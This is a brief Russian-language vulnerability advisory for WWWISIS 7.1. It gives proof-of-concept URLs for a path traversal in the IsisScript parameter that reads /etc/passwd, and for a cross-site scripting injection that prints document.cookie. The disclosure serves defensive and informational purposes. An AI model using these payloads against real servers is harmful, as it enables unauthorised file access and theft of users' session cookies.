Программа: WWWISIS 7.1
Уязвимость позволяет удаленному пользователю осуществить XSS нападение и выполнить произвольный PHP сценарий на целевой системе.
1) Уязвимость существует из-за недостаточной обработки входных данных в IsisScript. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
http://server/cgi-bin/wxis.exe/iah/?IsisScript=[file]
http://server/cgi-bin/wxis.exe/iah/?IsisScript=../../../../../../../../../etc/passwd
2) Уязвимость существует из-за недостаточной обработки входных данных в IsisScrip. Атакующий может выполнить произвольный сценарий в браузере жертвы в контексте безопасности уязвимого сайта.
Пример:
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base= article%5Edlibrary&fmt=iso.pft&lang=i
http://server/cgi-bin/wxis.exe/iah/?IsisScript=iah/iah.xis&base= article%5Edlibrary&fmt=iso.pft&lang=e <script>alert(document.cookie)</script>
